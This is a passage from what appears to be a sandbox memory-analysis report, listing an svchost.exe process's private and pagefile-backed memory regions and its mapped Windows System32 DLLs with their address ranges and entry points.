Region:
id = 942
start_va = 0x5d00000
end_va = 0x5dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 943
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 944
start_va = 0x6000000
end_va = 0x60fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006000000"
filename = ""
Region:
id = 945
start_va = 0x6100000
end_va = 0x61fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006100000"
filename = ""
Region:
id = 946
start_va = 0x6200000
end_va = 0x62fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006200000"
filename = ""
Region:
id = 947
start_va = 0x6400000
end_va = 0x64fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006400000"
filename = ""
Region:
id = 948
start_va = 0x6500000
end_va = 0x65fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006500000"
filename = ""
Region:
id = 949
start_va = 0x6600000
end_va = 0x66fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006600000"
filename = ""
Region:
id = 950
start_va = 0x6700000
end_va = 0x67fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006700000"
filename = ""
Region:
id = 951
start_va = 0x6900000
end_va = 0x69fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006900000"
filename = ""
Region:
id = 952
start_va = 0x6b00000
end_va = 0x6bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006b00000"
filename = ""
Region:
id = 953
start_va = 0x6d00000
end_va = 0x6dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d00000"
filename = ""
Region:
id = 954
start_va = 0x6e00000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006e00000"
filename = ""
Region:
id = 955
start_va = 0x6f00000
end_va = 0x6ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f00000"
filename = ""
Region:
id = 956
start_va = 0x7000000
end_va = 0x70fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007000000"
filename = ""
Region:
id = 957
start_va = 0x7100000
end_va = 0x71fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007100000"
filename = ""
Region:
id = 958
start_va = 0x7200000
end_va = 0x72fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007200000"
filename = ""
Region:
id = 959
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 960
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 961
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 962
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 963
start_va = 0x7ff681250000
end_va = 0x7ff68125cfff
monitored = 0
entry_point = 0x7ff681253980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 964
start_va = 0x7ff9fc260000
end_va = 0x7ff9fc50ffff
monitored = 0
entry_point = 0x7ff9fc261cf0
region_type = mapped_file
name = "netshell.dll"
filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")
Region:
id = 965
start_va = 0x7ff9fc5a0000
end_va = 0x7ff9fc674fff
monitored = 0
entry_point = 0x7ff9fc5bcf80
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 966
start_va = 0x7ff9fc680000
end_va = 0x7ff9fc6c3fff
monitored = 0
entry_point = 0x7ff9fc6a83e0
region_type = mapped_file
name = "updatehandlers.dll"
filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")
Region:
id = 967
start_va = 0x7ff9fc6d0000
end_va = 0x7ff9fc6f1fff
monitored = 0
entry_point = 0x7ff9fc6e2540
region_type = mapped_file
name = "updatepolicy.dll"
filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")
Region:
id = 968
start_va = 0x7ff9fc700000
end_va = 0x7ff9fc75cfff
monitored = 0
entry_point = 0x7ff9fc72e510
region_type = mapped_file
name = "usocore.dll"
filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")
Region:
id = 969
start_va = 0x7ff9fc790000
end_va = 0x7ff9fc80ffff
monitored = 0
entry_point = 0x7ff9fc7bd280
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 970
start_va = 0x7ff9fc810000
end_va = 0x7ff9fc821fff
monitored = 0
entry_point = 0x7ff9fc811a80
region_type = mapped_file
name = "bitsproxy.dll"
filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")
Region:
id = 971
start_va = 0x7ff9fc830000
end_va = 0x7ff9fc86efff
monitored = 0
entry_point = 0x7ff9fc8582d0
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 972
start_va = 0x7ff9fc870000
end_va = 0x7ff9fc877fff
monitored = 0
entry_point = 0x7ff9fc8713b0
region_type = mapped_file
name = "dmiso8601utils.dll"
filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")
Region:
id = 973
start_va = 0x7ff9ff230000
end_va = 0x7ff9ff240fff
monitored = 0
entry_point = 0x7ff9ff2328d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 974
start_va = 0x7ff9ff350000
end_va = 0x7ff9ff381fff
monitored = 0
entry_point = 0x7ff9ff35b0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 975
start_va = 0x7ff9ff390000
end_va = 0x7ff9ff3a7fff
monitored = 0
entry_point = 0x7ff9ff391b10
region_type = mapped_file
name = "locationframeworkinternalps.dll"
filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")
Region:
id = 976
start_va = 0x7ff9ff9a0000
end_va = 0x7ff9ff9b6fff
monitored = 0
entry_point = 0x7ff9ff9a7520
region_type = mapped_file
name = "usoapi.dll"
filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")
Region:
id = 977
start_va = 0x7ff9ffcd0000
end_va = 0x7ff9ffddefff
monitored = 0
entry_point = 0x7ff9ffd0c010
region_type = mapped_file
name = "dosvc.dll"
filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")
Region:
id = 978
start_va = 0x7ffa00360000
end_va = 0x7ffa0047cfff
monitored = 0
entry_point = 0x7ffa0038fe60
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 979
start_va = 0x7ffa01270000
end_va = 0x7ffa0128cfff
monitored = 0
entry_point = 0x7ffa01274f60
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 980
start_va = 0x7ffa01690000
end_va = 0x7ffa016a3fff
monitored = 0
entry_point = 0x7ffa01693710
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 981
start_va = 0x7ffa01740000
end_va = 0x7ffa0175dfff
monitored = 0
entry_point = 0x7ffa0174ef80
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 982
start_va = 0x7ffa069a0000
end_va = 0x7ffa069b5fff
monitored = 0
entry_point = 0x7ffa069a1d50
region_type = mapped_file
name = "wwapi.dll"
filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")
Region:
id = 983
start_va = 0x7ffa07a20000
end_va = 0x7ffa07a30fff
monitored = 0
entry_point = 0x7ffa07a27480
region_type = mapped_file
name = "tetheringclient.dll"
filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")
Region:
id = 984
start_va = 0x7ffa07a40000
end_va = 0x7ffa07ac3fff
monitored = 0
entry_point = 0x7ffa07a58d50
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 985
start_va = 0x7ffa07ad0000
end_va = 0x7ffa07ae5fff
monitored = 0
entry_point = 0x7ffa07ad55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 986
start_va = 0x7ffa07af0000
end_va = 0x7ffa07bc5fff
monitored = 0
entry_point = 0x7ffa07b1a800
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 987
start_va = 0x7ffa07c20000
end_va = 0x7ffa07c83fff
monitored = 0
entry_point = 0x7ffa07c3bed0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 988
start_va = 0x7ffa07c90000
end_va = 0x7ffa07cb4fff
monitored = 0
entry_point = 0x7ffa07c99900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 989
start_va = 0x7ffa07cc0000
end_va = 0x7ffa07cd3fff
monitored = 0
entry_point = 0x7ffa07cc1800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 990
start_va = 0x7ffa07ce0000
end_va = 0x7ffa07dd5fff
monitored = 0
entry_point = 0x7ffa07d19590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 991
start_va = 0x7ffa07de0000
end_va = 0x7ffa07e53fff
monitored = 0
entry_point = 0x7ffa07df5eb0
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 992
start_va = 0x7ffa07e60000
end_va = 0x7ffa07f96fff
monitored = 0
entry_point = 0x7ffa07ea0480
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 993
start_va = 0x7ffa08390000
end_va = 0x7ffa083a0fff
monitored = 0
entry_point = 0x7ffa08392fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 994
start_va = 0x7ffa083b0000
end_va = 0x7ffa083cdfff
monitored = 0
entry_point = 0x7ffa083b3a40
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 995
start_va = 0x7ffa083d0000
end_va = 0x7ffa08451fff
monitored = 0
entry_point = 0x7ffa083d2a10
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 996
start_va = 0x7ffa08460000
end_va = 0x7ffa08475fff
monitored = 0
entry_point = 0x7ffa08461af0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 997
start_va = 0x7ffa08480000
end_va = 0x7ffa08499fff
monitored = 0
entry_point = 0x7ffa08482330
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 998
start_va = 0x7ffa088d0000
end_va = 0x7ffa088e7fff
monitored = 0
entry_point = 0x7ffa088db850
region_type = mapped_file
name = "dmcmnutils.dll"
filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")
Region:
id = 999
start_va = 0x7ffa08940000
end_va = 0x7ffa0894efff
monitored = 0
entry_point = 0x7ffa08944960
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1000
start_va = 0x7ffa08a00000
end_va = 0x7ffa08a0bfff
monitored = 0
entry_point = 0x7ffa08a035c0
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1001
start_va = 0x7ffa08a10000
end_va = 0x7ffa08a4ffff
monitored = 0
entry_point = 0x7ffa08a1cbe0
region_type = mapped_file
name = "adsldpc.dll"
filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")
Region:
id = 1002
start_va = 0x7ffa08a50000
end_va = 0x7ffa08a96fff
monitored = 0
entry_point = 0x7ffa08a51d10
region_type = mapped_file
name = "activeds.dll"
filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")
Region:
id = 1003
start_va = 0x7ffa08ae0000
end_va = 0x7ffa08b21fff
monitored = 0
entry_point = 0x7ffa08ae3670
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1004
start_va = 0x7ffa08e00000
end_va = 0x7ffa08e1efff
monitored = 0
entry_point = 0x7ffa08e037e0
region_type = mapped_file
name = "netsetupapi.dll"
filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")
Region:
id = 1005
start_va = 0x7ffa08e20000
end_va = 0x7ffa08e98fff
monitored = 0
entry_point = 0x7ffa08e276a0
region_type = mapped_file
name = "netsetupshim.dll"
filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")
Region:
id = 1006
start_va = 0x7ffa08eb0000
end_va = 0x7ffa08eeffff
monitored = 0
entry_point = 0x7ffa08ec6c60
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1007
start_va = 0x7ffa08f10000
end_va = 0x7ffa08f27fff
monitored = 0
entry_point = 0x7ffa08f14e10
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Region:
id = 1008
start_va = 0x7ffa08f30000
end_va = 0x7ffa08f54fff
monitored = 0
entry_point = 0x7ffa08f35ca0
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 1009
start_va = 0x7ffa08f60000
end_va = 0x7ffa090e1fff
monitored = 0
entry_point = 0x7ffa08f782a0
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1010
start_va = 0x7ffa090f0000
end_va = 0x7ffa09192fff
monitored = 0
entry_point = 0x7ffa090f2c10
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1011
start_va = 0x7ffa091a0000
end_va = 0x7ffa091f1fff
monitored = 0
entry_point = 0x7ffa091a5770
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1012
start_va = 0x7ffa09200000
end_va = 0x7ffa0922dfff
monitored = 1
entry_point = 0x7ffa09202300
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 1013
start_va = 0x7ffa09230000
end_va = 0x7ffa0928dfff
monitored = 0
entry_point = 0x7ffa09235080
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 1014
start_va = 0x7ffa09290000
end_va = 0x7ffa092affff
monitored = 0
entry_point = 0x7ffa09291f50
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 1015
start_va = 0x7ffa092b0000
end_va = 0x7ffa092b8fff
monitored = 0
entry_point = 0x7ffa092b18f0
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 1016
start_va = 0x7ffa092c0000
end_va = 0x7ffa092d0fff
monitored = 0
entry_point = 0x7ffa092c1d30
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1017
start_va = 0x7ffa09330000
end_va = 0x7ffa09347fff
monitored = 0
entry_point = 0x7ffa09332000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1018
start_va = 0x7ffa09350000
end_va = 0x7ffa09390fff
monitored = 0
entry_point = 0x7ffa09353750
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1019
start_va = 0x7ffa09430000
end_va = 0x7ffa0947bfff
monitored = 0
entry_point = 0x7ffa09445310
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1020
start_va = 0x7ffa09490000
end_va = 0x7ffa0950efff
monitored = 0
entry_point = 0x7ffa094a7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1021
start_va = 0x7ffa09510000
end_va = 0x7ffa0954bfff
monitored = 0
entry_point = 0x7ffa09516aa0
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1022
start_va = 0x7ffa09c80000
end_va = 0x7ffa09c88fff
monitored = 0
entry_point = 0x7ffa09c821d0
region_type = mapped_file
name = "httpprxc.dll"
filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")
Region:
id = 1023
start_va = 0x7ffa09c90000
end_va = 0x7ffa09cc4fff
monitored = 0
entry_point = 0x7ffa09c9a270
region_type = mapped_file
name = "fwpolicyiomgr.dll"
filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")
Region:
id = 1024
start_va = 0x7ffa0a560000
end_va = 0x7ffa0a652fff
monitored = 0
entry_point = 0x7ffa0a585d80
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1025
start_va = 0x7ffa0ac50000
end_va = 0x7ffa0ac59fff
monitored = 0
entry_point = 0x7ffa0ac514c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1026
start_va = 0x7ffa0afc0000
end_va = 0x7ffa0afd1fff
monitored = 0
entry_point = 0x7ffa0afc3580
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1027
start_va = 0x7ffa0b050000
end_va = 0x7ffa0b06afff
monitored = 0
entry_point = 0x7ffa0b051040
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1028
start_va = 0x7ffa0b300000
end_va = 0x7ffa0b314fff
monitored = 0
entry_point = 0x7ffa0b302dc0
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 1029
start_va = 0x7ffa0b320000
end_va = 0x7ffa0b32dfff
monitored = 0
entry_point = 0x7ffa0b321460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1030
start_va = 0x7ffa0b330000
end_va = 0x7ffa0b33bfff
monitored = 0
entry_point = 0x7ffa0b332830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 1031
start_va = 0x7ffa0b340000
end_va = 0x7ffa0b34ffff
monitored = 0
entry_point = 0x7ffa0b341700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 1032
start_va = 0x7ffa0b350000
end_va = 0x7ffa0b358fff
monitored = 0
entry_point = 0x7ffa0b351ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 1033
start_va = 0x7ffa0b360000
end_va = 0x7ffa0b38cfff
monitored = 0
entry_point = 0x7ffa0b362290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 1034
start_va = 0x7ffa0b390000
end_va = 0x7ffa0b3e1fff
monitored = 0
entry_point = 0x7ffa0b3938e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 1035
start_va = 0x7ffa0b4a0000
end_va = 0x7ffa0b4b4fff
monitored = 0
entry_point = 0x7ffa0b4a3460
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1036
start_va = 0x7ffa0b4c0000
end_va = 0x7ffa0b559fff
monitored = 0
entry_point = 0x7ffa0b4dada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1037
start_va = 0x7ffa0b640000
end_va = 0x7ffa0b6a6fff
monitored = 0
entry_point = 0x7ffa0b6463e0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1038
start_va = 0x7ffa0b7a0000
end_va = 0x7ffa0b7aafff
monitored = 0
entry_point = 0x7ffa0b7a1d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1039
start_va = 0x7ffa0b800000
end_va = 0x7ffa0b8bffff
monitored = 0
entry_point = 0x7ffa0b82fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1040
start_va = 0x7ffa0b9f0000
end_va = 0x7ffa0ba09fff
monitored = 0
entry_point = 0x7ffa0b9f2430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1041
start_va = 0x7ffa0ba10000
end_va = 0x7ffa0ba25fff
monitored = 0
entry_point = 0x7ffa0ba119f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1042
start_va = 0x7ffa0baf0000
end_va = 0x7ffa0bb27fff
monitored = 0
entry_point = 0x7ffa0bb08cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1043
start_va = 0x7ffa0bbe0000
end_va = 0x7ffa0bc8dfff
monitored = 0
entry_point = 0x7ffa0bbf80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1044
start_va = 0x7ffa0bc90000
end_va = 0x7ffa0bca1fff
monitored = 0
entry_point = 0x7ffa0bc99260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1045
start_va = 0x7ffa0bcb0000
end_va = 0x7ffa0bd60fff
monitored = 0
entry_point = 0x7ffa0bd288b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1046
start_va = 0x7ffa0bd70000
end_va = 0x7ffa0bd83fff
monitored = 0
entry_point = 0x7ffa0bd72d50
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1047
start_va = 0x7ffa0bd90000
end_va = 0x7ffa0bdf6fff
monitored = 0
entry_point = 0x7ffa0bd9b160
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1048
start_va = 0x7ffa0c070000
end_va = 0x7ffa0c102fff
monitored = 0
entry_point = 0x7ffa0c079680
region_type = mapped_file
name = "msvcp_win.dll"
filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")
Region:
id = 1049
start_va = 0x7ffa0c2b0000
end_va = 0x7ffa0c2d4fff
monitored = 0
entry_point = 0x7ffa0c2c2f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1050
start_va = 0x7ffa0c2e0000
end_va = 0x7ffa0c2f0fff
monitored = 0
entry_point = 0x7ffa0c2e7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1051
start_va = 0x7ffa0c300000
end_va = 0x7ffa0c318fff
monitored = 0
entry_point = 0x7ffa0c304520
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1052
start_va = 0x7ffa0c9a0000
end_va = 0x7ffa0c9b3fff
monitored = 0
entry_point = 0x7ffa0c9a2a00
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1053
start_va = 0x7ffa0ca80000
end_va = 0x7ffa0ca99fff
monitored = 0
entry_point = 0x7ffa0ca82cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1054
start_va = 0x7ffa0ce40000
end_va = 0x7ffa0d1c1fff
monitored = 0
entry_point = 0x7ffa0ce91220
